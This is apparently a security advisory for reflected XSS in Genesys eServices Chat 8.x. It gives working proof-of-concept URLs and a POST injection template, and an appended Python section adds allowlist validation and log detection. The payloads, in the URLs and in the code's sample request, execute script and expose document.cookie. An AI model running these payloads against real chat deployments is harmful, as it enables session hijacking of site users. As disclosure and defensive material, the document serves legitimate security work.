Created October 15, 2019 14:28
Hi all,
My name is Luis Eduardo Jácome V. (a.k.a. Mortal_Poison) and I found a vulnerability (gXSS and pXSS) in Genesys eServices Chat that affects versions 8.x.x.
First of all, if you find a Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML source, it is vulnerable:
A small PoC (for versions 8.1.x):
https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
The problem is that the application does not sanitize the form values correctly (HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp).
The file differs between versions of Genesys eServices Chat; however, in none of the versions is the form validated.
For versions with "<!-- Version 8.1.000.07 -->" in the HTML source, you can execute the following payload:
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
If the request is made with the POST method, you should see something like the following (it may vary depending on the fields of the form):
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300
In the %INJECT_HERE% part you have to inject the malicious payload, for example: </Script/><Script/>(confirm)(1)</Script/>
Insert it without the "%" characters.
Remember that you must capture the request with an application that intercepts requests; in my case, Burp Suite.
The product is used by many companies; however, not all of them are indexed by search engines.
https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF
Contact:
Twitter: @Mortal_Poison_
Youtube: https://youtube.com/XecureLabs
Web Page: https://xecure-labs.com
Affected versions:
Genesys eServices Chat 8.x.x
Tested on:
Firefox 50.0 and 60.0
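The root cause described above is that parameter values (colors, font settings, logo path, email) are reflected into the page without validation or encoding. As an added defensive illustration that is not part of the advisory or of the Genesys product, the following Python code applies a per-parameter allowlist to the query strings shown in this advisory and HTML-escapes any value that still has to be reflected; the parameter names come from the advisory's URLs, while the accepted formats, the `RULES` table and the sample requests are assumptions constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, urlencode
from html import escape

# Allowlist per query parameter of HtmlChatPanel.jsp / HtmlChatFrameSet.jsp.
# Names are taken from the advisory's sample URLs; the accepted formats are
# assumptions about what the chat panel legitimately needs (hex colors etc.).
HEX_COLOR = r"[0-9A-Fa-f]{6}"
RULES = {name.lower(): re.compile(pattern) for name, pattern in {
    "ActionColor": HEX_COLOR, "ClientNickNameColor": HEX_COLOR,
    "AgentNickNameColor": HEX_COLOR, "ClientMessageColor": HEX_COLOR,
    "AgentMessageColor": HEX_COLOR, "BackgroundColor": HEX_COLOR,
    "FontSize": r"\d{1,3}(px)?",
    "FontName": r"[A-Za-z ]{1,32}",
    "ShowSmiles": r"[01]",
    "Logo": r"(\./Resource/Images/|https://)[\w./%-]+\.(jpg|png|gif)",
    "Email": r"[\w.+-]{1,64}@[\w.-]{1,255}",
}.items()}


def check_query(url):
    """Return (param, reason) findings for one chat-panel request URL.

    Names are compared case-insensitively because the advisory shows both
    'Email' (HtmlChatPanel.jsp) and 'email' (HtmlChatFrameSet.jsp).
    """
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        rule = RULES.get(name.lower())
        if rule is None:
            findings.append((name, "unexpected parameter"))
        elif not rule.fullmatch(value):
            findings.append((name, "value violates allowlist"))
    return findings


def safe_reflect(name, value):
    """Value a page may embed for this parameter: allowlisted and HTML-escaped,
    or None when it fails the check (caller must fall back to a default)."""
    rule = RULES.get(name.lower())
    if rule is None or not rule.fullmatch(value):
        return None
    return escape(value, quote=True)


# Constructed sample requests in the shape of the advisory's URLs (not real logs).
BENIGN = "https://example.com/HtmlChatPanel.jsp?" + urlencode({
    "ActionColor": "080008", "ClientNickNameColor": "000019",
    "Logo": "./Resource/Images/logo.jpg", "FontSize": "13px",
    "FontName": "arial", "ShowSmiles": "0", "BackgroundColor": "FFFFFF"})
INJECTED = "https://example.com/HtmlChatPanel.jsp?" + urlencode({
    "ActionColor": "</Script/><Svg/OnLoad=(confirm)(document.cookie)>",
    "ClientNickNameColor": "</SCRIPT/>", "AgentNickNameColor": "008000"})
```

Running `check_query` over web-server access logs for these two JSP files gives a cheap detection rule, and `safe_reflect` shows the output-side fix the advisory says is missing: validate against the expected format first, encode second, never echo the raw value.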